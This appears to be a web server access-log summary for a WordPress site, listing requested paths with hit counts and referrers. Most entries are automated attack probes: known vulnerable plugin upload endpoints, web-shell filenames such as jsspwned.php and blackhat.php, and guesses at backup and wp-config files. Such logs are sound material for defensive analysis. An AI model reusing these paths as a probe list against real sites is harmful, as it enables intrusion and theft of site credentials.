/%D1%82%D0%B5%D0%B0%D1%82%D1%80-%D0%BC%D0%B0%D1%8F%D0%BA%D0%BE%D0%B2%D1%81%D0%BA%D0%BE%D0%B3%D0%BE-%D1%81%D0%BF%D0%B5%D0%BA%D1%82%D0%B0%D0%BA%D0%BB%D1%8C-%D1%80%D0%B0%D0%B7%D0%B2%D0%BE%D0%B4-%D0%BF/ 2 -
/veggiedog.gz 1 -
/xn--fretagshem-ecb.nu.gz 1 -
/wp-content/plugins/ubh/up.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/plugins/ubh/up.php
/wp/wp-admin/install.php 5 -
/js.php 3 http://site.ru
/wp-content/plugins/wp-symetrio/schedule-symetrio.php 1 -
/jomla/ 1 -
/wp-content/themes/cubed_v1.2/functions/upload-handler.php 1 -
/wp-content/plugins/barclaycart/uploadify/jsspwned.php 1 -
/public_html.tar.gz 1 -
/wp-content/plugins/duplicator/assets/css/style.css 1 -
/wp-content/uploads/settingsimages/jsspwned.php 1 -
/wp-content/plugins/pitchprint/uploader/files/jsspwned.php 1 -
/wp-content/uploads/wp-console.php 2 http://site.ru
/index/wp-login.php 1 -
/test/ 5 -
/xo.php 1 -
/wp_old/ 1 -
/wp-content/uploads/assets/temp/jsspwned.php 1 -
/wp-json/cf-api/v2/pro/file 1 -
/wp-config.php.bak 1 -
/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/jsspwned.php 2 -
/administrator/ 7 -
/%D0%BE%D1%82%D0%B4%D1%8B%D1%85-%D0%B2-%D0%B3-%D1%8F%D0%BB%D1%82%D0%B5/ 1 -
/cache_.php.suspected 1 -
/wp-content/plugins/asset-manager/upload.php 1 -
/profile/register/ 1 -
/wp-content/uploads/2019/01/%C3%90%C5%B8%C3%90%C2%B5%C3%91%E2%82%AC%C3%90%C2%B5%C3%91%E2%80%A1%C3%90%C2%B5%C3%90%C2%BD%C3%91%C5%92-%C3%90%C2%BE%C3%91%E2%82%AC%C3%90%C2%B3%C3%90%C2%B0%C3%90%C2%BD%C3%90%C2%B8%C3%90%C2%B7%C3%90%C2%B0%C3%91%E2%80%A0%C3%90%C2%B 1 -
/wp.gz 1 -
/wp-content/uploads/headway/header-uploads/jsspwned.php 1 -
//user/register/ 3 http://www.google.com.hk
/.well-known.zip 1 -
/master.gz 1 -
/wp-content/plugins/wordfence/images/logo.png 3 -
/wp-content/vuln.php 3 -
/WKYQ.php 1 -
/wp-content/plugins/wp-simple-cart/request/simple-cart-upload.php 1 -
/wp-content/uploads/2018/05/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5.doc 9 http://www.google.com/
/xn--g1akdbaehef3a2a5g.sql 1 -
/%D1%8E%D0%B1%D0%B8%D0%BB%D1%8F%D1%80%D0%B0%D0%BC/ 1 -
/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php 1 -
/language/en-GB/en-GB.xml 3 -
/cgi-bin.zip 1 -
/wp-admin/formcheck.php 1 -
/xn--fretagshem-ecb.gz 1 -
/blog/xmlrpc.php 1 -
/wp-json/siteground-optimizer/v1/switch-php 1 -
/wp-content/uploads/2018/11/content-post.php 2 http://site.ru
/wp-config.orig 1 -
/archive.gz 1 -
/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-deep-gray/designit/cs/upload.php 1 -
/wp-content/plugins/temp.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/plugins/temp.php
/OMC_template.tar.gz 1 -
/wp-content/themes/index2.php 1 http://site.ru
/wp-content/plugins/easyrotator-for-wordpress/indox.php 2 http://site.ru
/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/ 1 -
/license.php 7 -
/backup.sql 1 -
/wp-config.php.orig 1 -
/wp-content/plugins/omni-secure-files/plupload/examples/upload.php 2 -
/ads.txt 1 -
/wp-content/plugins/types/readme.txt 1 -
/wp-includes/theme-compat/images.php 1 http://site.ru
/archive.zip 1 -
/yt.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/yt.php
/v2/ 3 -
/%d0%bd%d0%be%d0%b2%d0%be%d0%b3%d0%be%d0%b4%d0%bd%d0%b8%d0%b9-%d0%bf%d1%80%d0%b0%d0%b7%d0%b4%d0%bd%d0%b8%d0%ba-%d0%b2-%d0%b3%d0%b4%d0%ba/ 2 -
/9-%D0%B4%D0%B5%D0%BA%D0%B0%D0%B1%D1%80%D1%8F-2017-%D0%B3-%D0%BF%D0%BE%D0%B5%D0%B7%D0%B4%D0%BA%D0%B0-%D0%B2-%D0%BC%D0%BE%D1%81%D0%BA%D0%BE%D0%B2%D1%81%D0%BA%D0%B8%D0%B9-%D1%86%D0%B8%D1%80%D0%BA/ 1 -
/wp-content/plugins/totaldonations/js/migla_main.js 1 -
/wp-content/uploads/sgqn82nf032.php 1 -
/wp-content/uploads/i-dump-uploads/jsspwned.php 1 -
/wp-content/plugins/wp-db-ajax-made/pas.php 1 -
/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wp-content/plugins/contus-video-galleryversion-10/jsspwned.php 1 -
/wp-content/plugins/cronblocks/indox.php 1 http://site.ru
/wp-rpcxml.php 1 -
/wp-content.gz 1 -
/wp-content/plugins/background-image-cropper/blackhat.php 1 http://site.ru
/wp-content/themes/centum/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/files.sql 1 -
/wp-content/uploads/2018/12/blackhat.php 1 http://site.ru
/news/ 1 -
/wp.tar.gz 1 -
/wp-config.bak 1 -
/wp-content/plugins/sfn.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/plugins/sfn.php
/wp.zip 1 -
/wp-content/uploads/2018/10/wp-console.php 1 http://site.ru
/wp-content/plugins/clode/worse.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/plugins/clode/worse.php
/%D0%B7%D0%B0%D0%BA%D1%80%D1%8B%D1%82%D0%BE%D0%B5-%D0%BF%D1%80%D0%B5%D0%B4%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D1%82-fox-fitness/ 1 -
/administrator/webconfig.txt.php 3 http://www.google.com.hk
/xn--fretagshem-ecb.zip 1 -
/wp-content/plugins/dzs-videowhisper/upload.php 1 -
/wp-content/plugins/easy-wp-smtp/readme.txt 4 -
/wp-content/plugins/barclaycart/uploadify/settings_auto.php 1 -
/wp-content/plugins/vwclean/bump.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/plugins/vwclean/bump.php
/wordpress.tar.gz 1 -
/wd-admin 1 -
// 1 -
/wp-content/themes/multimedia1/server/php/ 1 -
/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/jsspwned.php 1 -
/wp-content/themes/library/visual-editor/lib/upload-header.php 1 -
/wp-content/plugins/cherry-plugin/admin/import-export/jsspwned.php 2 -
/new/ 5 -
/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php 1 -
/wp-content/plugins/woo-confirmation-email/assets/js/woo-confirmation-email-admin.js 1 -
/wordpress/wp-login.php 3 -
/master.php 1 -
/wp-content/plugins/userpro/scripts/scripts.min.js 1 -
/wp-content/plugins/seo/wp-blogs.php 1 -
/vveb.php 1 -
/wp-content/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wp/test/ 1 -
/wp-content/satoshi/images/jsspwned.php 1 -
/wp-content/uploads/2016/09/%D0%9F%D0%B0%D0%BC%D1%8F%D1%82%D0%BA%D0%B0-2016-%D0%BF%D0%BE-%D0%9C%D0%9F-%D0%96%D0%B8%D0%BB%D1%8C%D0%B5-%D0%B2-%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82.doc 1 -
/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php 4 -
/style_.php 1 -
/wp-content/vz.php 2 http://site.ru
/wp-content/themes/satoshi/upload-file.php 1 -
/wp-content/plugins/wp-seo/idx.php 2 http://site.ru
/wp-content/plugins/ungallery/source_vuln.php 1 -
/wp-content/uploads/2018/01/aul.php 1 http://site.ru
/wordpress/wp-content/plugins/ubh/up.php 1 -
/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js 4 -
/%C3%91%C2%81%C3%90%C2%BE%C3%91%C2%81%C3%91%C2%82%C3%90%C2%B0%C3%90%C2%B2-%C3%90%C2%B8-%C3%90%C2%BA%C3%90%C2%BE%C3%90%C2%BC%C3%90%C2%B8%C3%91%C2%81%C3%91%C2%81%C3%90%C2%B8%C3%90%C2%B8 1 -
/wp-content/uploads/wysija/themes/v5wysija/jsspwned.php 1 -
/backup.zip 1 -
/about.php 1 -
/wp-content/plugins/cherry-plugin/admin/import-export/settings_auto.php 1 -
/wp-content/plugins/woocommerce-abandoned-cart/assets/js/abandoncart_plugin_button.js 1 -
/wp-content/plugins/barclaycart/uploadify/uploadify.php 2 -
/wp-content/uploads/2018/01/ask.php 1 http://site.ru
/wp-config.php.original 1 -
/wp-content/themes/mTheme-Unus/css/css.php 4 -
/wp2/ 1 -
/wp-upload-class.php.suspected 1 -
/%D1%87%D1%83%D0%B4%D0%B5%D1%81%D0%B0-%D0%B8-%D0%BA%D1%83%D1%80%D0%B0%D0%BB%D0%B5%D1%81%D1%8B/ 2 -
/wp-content/plugins/background-image-cropper/new_license.php 1 -
/50-%D1%81%D1%82%D0%BE%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D0%B8-%D0%B7%D0%B0-%D0%BF%D0%BE%D1%81%D0%B5%D1%89%D0%B5%D0%BD%D0%B8%D0%B5-%D0%B2%D0%B5%D1%87%D0%B5%D1%80%D0%BE%D0%B2-%D0%B4%D0%BE%D0%BC%D0%B0-%D1%83/ 1 -
/wp-content/plugins/mobile-app-builder-by-wappress/jsspwned.php 1 -
/%25D0%25BC%25D0%25B0%25D1%2581%25D0%25BB%25D0%25B5%25D0%25BD%25D0%25B8%25D1%2586%25D0%25B0-%25D0%25B2-%25D1%258D%25D1%2582%25D0%25BD%25D0%25BE%25D0%25BC%25D0%25B8%25D1%2580%25D0%25B5/ 1 https://www.google.com/
/backup.tar.gz 1 -
/rt18_archive.zip 1 -
/wp-content/plugins/cherry-plugin/admin/import-export/upload.php 2 -
/administrator 1 -
/wp-content/themes/MoneyTheme/uploads/uploads/jsspwned.php 1 -
/admin/images/cal_date_over.gif 1 -
/wp-content/plugins/wp-seo/wp-seo.php 1 http://site.ru
/wp-xml.php 1 -
/main.sql 1 -
/seo_script.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/seo_script.php
/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php 1 -
/wp-content/themes/multimedia1/server/php/files/jsspwned.php 1 -
/cgi-bin.gz 1 -
/wp-content/files_mf/jsspwned.php 1 -
/master.tar.gz 1 -
/wp-content/plugins/recent-backups/download-file.php 4 -
/new_license.php.suspected 1 -
/404.php 2 http://site.ru
/%D1%81%D0%BF%D0%B5%D0%BA%D1%82%D0%B0%D0%BA%D0%BB%D1%8C-%D0%BA%D0%B0%D0%BB%D1%83%D0%B6%D1%81%D0%BA%D0%BE%D0%B3%D0%BE-%D0%B4%D1%80%D0%B0%D0%BC%D1%82%D0%B5%D0%B0%D1%82%D1%80%D0%B0-%D1%80%D0%BE/ 4 -
/database.sql 1 -
/wp-content/plugins/add-to-any/jp-min.php 1 -
/templates/system/css/system.css 2 -
/assets/images/accesson.php 2 -
/cache_.php 1 -
/wp-content/plugins/sexy-contact-form/includes/fileupload/files/ 1 -
/wp-ajax-hook.php.suspected 1 -
/wp-content/plugins/webapp-builder/server/images.php 1 -
/wp1/ 1 -
/wp-content/uploads/wpstorecart/jsspwned.php 1 -
/wp-content.zip 1 -
/wp-content/plugins/uploader/uploadify/uploadify.php 1 -
/blog/ 5 -
/wp-config.php~ 1 -
/wp/ 5 -
/en/ 1 -
/backups.sql 1 -
/sql.sql 1 -
/v1/ 3 -
/wp-content/plugins/zen-mobile-app-native/jsspwned.php 1 -
/wp-content/wp-rewrite.php 1 -
/installer.zip 1 -
/wp-content/plugins/css-ready-sele/r.php 1 http://site.ru
/wp-content/uploads/2016/09/%D0%9D%D0%BE%D0%B2%D0%B0%D1%8F-%D1%80%D0%B5%D0%B4%D0%B0%D0%BA%D1%86%D0%B8%D1%8F-13-61-%D0%BE%D1%82-281014-%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BF%D0%BE-%D0%96%D0%B8%D0%BB%D1%8C%D1%8E-%D0%B2-%D0%BA%D1%80%D0% 2 -
/wp-content/plugins/zen-mobile-app-native/server/images.php 1 -
/wp-content/uploads/product_files/jsspwned.php 1 -
/mini.php 1 http://site.ru
/sample-page/wp-login.php 37 http://xn--g1akdbaehef3a2a5g.xn--p1ai/sample-page/wp-login.php
/wordpress.gz 1 -
/demo/ 5 -
/wp-content/plugins/formcraft/file-upload/server/content/upload.php 3 -
/backup/ 4 -
/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wp-content/plugins/omni-secure-files/plupload/examples/uploads/jsspwned.php 2 -
/InCreate-FullPackage.zip 2 -
/wp-content/plugins/log.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/plugins/log.php
/wp-content/plugins/wp-property/third-party/uploadify/jsspwned.php 1 -
/wp-content/plugins/php-event-calendar/server/file-uploader/ 2 -
/media/mod.php 2 http://site.ru
/installer.php 4 -
/wp-content/uploads/$year/$month/jsspwned.php 3 -
/wp-content/themes/dance-studio/core/libs/imperavi/tests/file_upload.php 1 -
/wp-content/themes/ultimatum/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wp-content/plugins/formcraft/file-upload/server/php/upload.php 4 -
/xn--fretagshem-ecb.nu.tar.gz 1 -
/v3/ 1 -
/rt18_archive.gz 1 -
/site.sql 1 -
/OMC_template.zip 1 -
/ 28 -
/%D0%BE%D1%82%D0%B4%D1%8B%D1%85-%D0%B2-%D0%BA%D0%B0%D0%B1%D0%B0%D1%80%D0%B4%D0%B8%D0%BD%D0%BA%D0%B5/ 1 -
/wp-content/yt.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/yt.php
/installer-data.sql.zip 1 -
/wp-content/uploads/2018/11/blackhat.php 2 http://site.ru
/modules/mod_simplefileuploadv1.3/elements/udd.php 1 -
/wp-content/plugins/wp-symposium/server/php/index.php 4 -
/wp-content/themes/pinboard/themify/themify-ajax.php 1 -
/%d0%bc%d0%b0%d1%80%d1%82-%d1%8e%d0%b1%d0%b8%d0%bb%d1%8f%d1%80%d1%8b/ 1 -
/wp-includes/wp-tomar.php 2 http://site.ru
/wp-json/wp/v2/posts/1191,%22href%22:%22https:%5C/%5C/%5Cu043f%5Cu0440%5Cu043e%5Cu0444%5Cu0441%5Cu043e%5Cu044e%5Cu0437%5Cu043c%5Cu0440%5Cu043d%5Cu0446.%5Cu0440%5Cu0444%5C/wp-json%5C/wp%5C/v2%5C/posts%5C/1189%5C/revisions%5C/1191%22%7D],%22wp:attachment%22: 1 -
/wp-content/themes/pindol/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/joomla/robots.txt 1 -
/wp-content/plugins/wp-symposium/server/php/gLsnabBAPjkxXG.php 1 -
/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/quick_install_archive.zip 1 -
/wp-content/plugins/revslider/temp/update_extract/revslider/db.php 4 -
/veggiedog.zip 1 -
/backup.gz 1 -
/wp-config.php.save 1 -
/blog 1 -
/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php 1 -
/customizer.php 1 -
/9-%d0%b4%d0%b5%d0%ba%d0%b0%d0%b1%d1%80%d1%8f-2017-%d0%b3-%d0%bf%d0%be%d0%b5%d0%b7%d0%b4%d0%ba%d0%b0-%d0%b2-%d0%bc%d0%be%d1%81%d0%ba%d0%be%d0%b2%d1%81%d0%ba%d0%b8%d0%b9-%d1%86%d0%b8%d1%80%d0%ba/ 1 -
/wp-content/plugins/wp-mobile-detector/cache/db.php 4 -
/wp-content/uploads/2019/02/jsspwned.php 2 -
/wp-config.php.old 1 -
/%D0%BD%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE%D0%B4%D0%BD%D0%B8%D0%B9-%D1%82%D0%B5%D0%B0%D1%82%D1%80%D0%B0%D0%BB%D0%B8%D0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9-%D1%83%D1%82%D1%80%D0%B5%D0%BD%D0%BD%D0%B8/ 2 -
/website.sql 1 -
/wp/xmlrpc.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai
/wp-content/plugins/wp-symposium/server/php/XqenfPtfAipknx.php 1 -
/%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B0-%D0%BF%D1%80%D0%B0%D0%B7%D0%B4%D0%BD%D0%B8%D1%87%D0%BD%D1%8B%D1%85-%D0%BC%D0%B5%D1%80%D0%BE%D0%BF%D1%80%D0%B8%D1%8F%D1%82%D0%B8%D0%B9-%D0%BF/ 2 -
/wp/wp-content/themes/AdvanceImage5/functions.php 2 -
/wp-content/plugins/wp-simple-cart/files/$uploadfolder/temporary/jsspwned.php 1 -
/wp-content/uploads/2019/02/%C3%90%C5%A1%C3%90%C2%BE%C3%90%C2%BD%C3%91%E2%80%A0%C3%90%C2%B5%C3%91%E2%82%AC%C3%91%E2%80%9A%C3%91%E2%80%B9_%C3%90%C5%B8%C3%90%C5%A1.doc 1 -
/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php 1 -
/wp-content/uploads/uigen_YEAR/file.php 1 -
/wp-content/uploads/2018/02/ask.php 2 http://site.ru
/newsleter.php.suspected 1 -
/wp-content/themes/beach_apollo/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wp-content/uploads/2018/12/content-post.php 2 http://site.ru
/wp-content.tar.gz 1 -
/%D0%BE%D1%82%D0%B4%D1%8B%D1%85-%D0%B2-%D0%BA%D1%80%D1%8B%D0%BC%D1%83/ 3 -
/%D0%BC%D1%83%D0%B7%D0%B5%D0%B9-%D0%B7%D0%B0%D0%BF%D0%BE%D0%B2%D0%B5%D0%B4%D0%BD%D0%B8%D0%BA-%D0%B0-%D0%BF-%D1%87%D0%B5%D1%85%D0%BE%D0%B2%D0%B0-%D0%BC%D0%B5%D0%BB%D0%B8%D1%85%D0%BE%D0%B2%D0%BE/ 1 -
/wp-content/plugins/dzs-videowhisper/upload/jsspwned.php 1 -
/wp-content/uploads/wpmp-previews/jsspwned.php 1 -
/wp-content/plugins/social-networking-e-commerce-1/images/uploads/jsspwned.php 1 -
/dump.sql 1 -
/3-%D0%BF%D1%83%D1%82%D0%B5%D0%B2%D0%BA%D0%B8-%D0%B2-%D0%B4%D0%B5%D1%82%D1%81%D0%BA%D0%B8%D0%B9-%D1%81%D0%B0%D0%BD%D0%B0%D1%82%D0%BE%D1%80%D0%B8%D0%B9-%D0%B7%D0%BE%D1%80%D1%8C%D0%BA%D0%B0/ 3 -
/wp-content/jsspwned.php 1 -
/wp-admin.zip 1 -
/wp-content/plugins/wordpress-member-private-conversation/doupload.php 2 -
/database_backup.sql 1 -
/wp-content/plugins/radykal-fancy-gallery/admin/jsspwned.php 1 -
/installer.tar.gz 1 -
/%D1%81%D0%BF%D0%B5%D0%BA%D1%82%D0%B0%D0%BA%D0%BB%D1%8C-%D0%BA%D0%B0%D0%BB%D1%83%D0%B6%D1%81%D0%BA%D0%BE%D0%B3%D0%BE-%D0%B4%D1%80%D0%B0%D0%BC%D0%B0%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B3%D0%BE/ 1 -
/wp-content/themes/MoneyTheme/uploads/upload.php 1 -
/wordpress/wp-admin/install.php 2 -
/installer.gz 1 -
/wp-content/plugins/contus-video-galleryversion-10/upload1.php 1 -
/%D0%B6%D0%B8%D0%BB%D1%8C%D0%B5-%D0%B2-%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82/ 1 -
/xn--fretagshem-ecb.nu.zip 1 -
/content-post.php 1 -
/old_wp/ 1 -
/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/jsspwned.php 2 -
/%D0%B8%D0%BD%D0%B4%D0%B8%D0%B2%D0%B8%D0%B4%D1%83%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B5-%D0%BF%D1%80%D0%B5%D0%B4%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%B4%D0%BB%D1%8F-%D1%81%D0%BE%D1%82%D1%80/ 2 -
/new/wp-admin/install.php 1 -
/wp-ajax-hook.php 1 -
/wp-content/uploads/uigen_2015/jsspwned.php 1 -
/ix-%D1%81%D0%BF%D0%B0%D1%80%D1%82%D0%B0%D0%BA%D0%B8%D0%B0%D0%B4%D0%B0-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2-%D0%B7%D0%B4%D1%80%D0%B0%D0%B2%D0%BE%D0%BE%D1%85%D1%80%D0%B0%D0%BD/ 2 -
/wp-content/uploads/2017/06/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5-c-01.20 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%B0%D1%8F-%D0%BA%D0%B0%D1%80%D1%82%D0%B0/
/wp-content/plugins/dzs-zoomsounds/admin/upload.php 2 -
/wp-admin/admin-ajax.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-admin/customize.php
/new_license.php 1 -
/wp-content/plugins/showbiz/temp/update_extract/jsspwned.php 1 -
/OMC_template.gz 1 -
/tmp/ 3 -
/installer-data.sql.gz 1 -
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php 1 -
/server.php 1 -
/file.sql 1 -
/searchreplacedb2.php 1 -
/wp-content/themes/pinboard/uploads/jsspwned.php 1 -
/wp-content/plugins/candidate-application-form/downloadpdffile.php 4 -
/wp-content/uploads/2018/12/wawa.php 1 http://site.ru
/yt2.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/yt2.php
/veggiedog.tar.gz 1 -
/wp-content/plugins/wp-mobile-detector/cache/settings_auto.php 1 -
/%D1%80%D0%BE%D0%BC%D0%B0%D0%BD%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B0%D1%8F-%D0%BA%D0%BE%D0%BC%D0%B5%D0%B4%D0%B8%D1%8F-%D0%B0%D0%BD%D0%B3%D0%B5%D0%BB-%D0%B8%D0%B7-%D0%B1%D0%B0%D0%B2%D0%B0%D1%80/ 3 -
/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php 1 -
/wp-content/uploads/2016/09/%D0%A1%D1%80%D0%BE%D0%BA%D0%B8-%D0%B7%D0%B0%D1%8F%D0%B2%D0%BE%D1%87%D0%BD%D0%BE%D0%B9-2016-%D0%9C%D0%9F-%D0%96%D0%B8%D0%BB%D1%8C%D0%B5-%D0%B2-%D0%BA%D1%80%D0%B5%D0%B4%D0%B8%D1%82.doc 2 -
/wp-content/plugins/php-event-calendar/server/file-uploader/jsspwned.php 2 -
/store/wp-login.php 1 -
/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php 2 -
/wp-content/wp-system.php 1 -
/%D0%B2%D0%B8%D1%82%D1%8F%D0%B7%D0%B5%D0%B2%D0%BE-%D0%B3%D0%BE%D1%81%D1%82%D0%B5%D0%B2%D0%BE%D0%B9-%D0%B4%D0%BE%D0%BC-%D0%BB%D0%B8%D0%B7%D0%B0/ 4 -
/wp-admin/css/colors/blue/theme.php 1 http://site.ru
/temp/ 3 -
/wp-content/uploads/2018/02/blackhat.php 1 http://site.ru
/wordpress/wp-content/themes/AdvanceImage5/functions.php 1 -
/wp-content/themes/betheme/muffin-options/fields/upload/Files/jsspwned.php 1 -
/u3p.php 1 -
/content-post.php.suspected 1 -
/%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9-%D0%B3%D0%BE%D0%B4-%D0%B2-%D0%BC%D0%BD%D0%B8%D0%BE%D0%B8-%D0%B8%D0%BC-%D0%BF-%D0%B0-%D0%B3%D0%B5%D1%80%D1%86%D0%B5%D0%BD%D0%B0/ 3 -
/public_html.zip 1 -
/wp3/ 1 -
/wp-content/uploads/2018/08/content-post.php 1 http://site.ru
/wp.php 1 -
/dev/ 2 -
/%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B5-%D0%BF%D1%80%D0%B5%D0%B4%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%B4%D0%BB%D1%8F-%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD/ 1 -
/public_html.gz 1 -
/installer-backup.php 5 http://xn--g1akdbaehef3a2a5g.xn--p1ai/installer.php
/wp-content/plugins/pitchprint/uploader/ 1 -
/home/ 6 -
/jm-ajax/upload_file/ 1 -
/xn--g1akdbaehef3a2a5g.xn--p1ai.zip 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/xn--g1akdbaehef3a2a5g.xn--p1ai.zip
/wp-content/plugins/social-networking-e-commerce-1/classes/views/social-options/form_cat_add.php 1 -
/sitemap.xml 2 -
/wp-content/plugins/apikey/apikey.php 1 -
/wp-content/plugins/background-image-cropper/wp-console.php 1 http://site.ru
/wp-config.original 1 -
/wp-content/themes/konzept/includes/uploadify/uploads/jsspwned.php 1 -
/wp-content/plugins/wp-mobile-detector/resize.php 6 -
/writebab.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/writebab.php
/Old/ 1 -
/admin/login.php 1 -
/fckeditor/editor/filemanager/connectors/php/jsspwned.php 1 -
/wp-content/plugins/ASO/ASO.html 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai/wp-content/plugins/ASO/ASO.html
/dup-installer/main.installer.php 1 -
/wp-includes/SimplePie/Content/Type/wp-console.php 2 http://site.ru
/vuln.htm 1 -
/wp-content/plugins/magic-fields/RCCWP_upload_ajax.php 1 -
/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/jsspwned.php 1 -
/admin/index.php 8 http://XN--G1AKDBAEHEF3A2A5G.XN--P1AI/admin/index.php
/fullwebsite.sql 1 -
/wp-content/plugins/totaldonations/css/mg_progress-bar.css 1 -
/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php 1 -
/beta/ 1 -
/temp.php 1 -
/%D0%BF%D1%80%D0%B0%D0%B7%D0%B4%D0%BD%D0%B8%D1%87%D0%BD%D1%8B%D0%B9-%D0%BA%D0%BE%D0%BD%D1%86%D0%B5%D1%80%D1%82/ 1 -
/wp-content/uploads/2019/03/content-post.php 2 http://site.ru
/fullbackup.sql 1 -
/master.zip 1 -
/wp-content/plugins/wp-symposium/server/php/DDqVCyIdsgMvjJ.php 1 -
/old/ 5 -
/hook-filters.php 2 -
/phpmyadmin/ 2 -
/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wp-content/plugins/social-warfare/lib/admin/assets/css/admin.css 1 -
/main/ 6 -
/quick_install_archive.gz 1 -
/18-%D0%BD%D0%BE%D1%8F%D0%B1%D1%80%D1%8F-2017-%D0%B3-%D0%B1%D0%BE%D0%BB%D1%8C%D1%88%D0%BE%D0%B9-%D0%BC%D0%BE%D1%81%D0%BA%D0%BE%D0%B2%D1%81%D0%BA%D0%B8%D0%B9-%D0%B3%D0%BE%D1%81%D1%83%D0%B4%D0%B0%D1%80/ 1 -
/.well-known.gz 1 -
/wp-content/plugins/caldera-forms/assets/css/cfont.css 1 -
/wp-content/jssor-slider/jssor-uploads/jsspwned.php 1 -
/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php 2 -
/wp-content/uploads/2018/12/ask.php 1 http://site.ru
/%D1%86%D0%B8%D1%80%D0%BA-%D0%BD%D0%B0-%D0%B2%D0%B5%D1%80%D0%BD%D0%B0%D0%B4%D1%81%D0%BA%D0%BE%D0%B3%D0%BE/ 1 -
/wp-content/uploads/2018/12/aul.php 2 http://site.ru
/wp-content/plugins/WP_Estimation_Form/assets/css/lfb_frontendPackedLibs.min.css 1 -
/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php 1 -
/archive.tar.gz 1 -
/apple-touch-icon-120x120.png 2 -
/installer-log.txt 1 -
/wp-content/uploads/2018/09/content-post.php 2 http://site.ru
/.well-known.tar.gz 1 -
/wp-content/plugins/dzs-zoomsounds/admin/upload/jsspwned.php 2 -
/wp-content/uploads/jsspwned.php 2 -
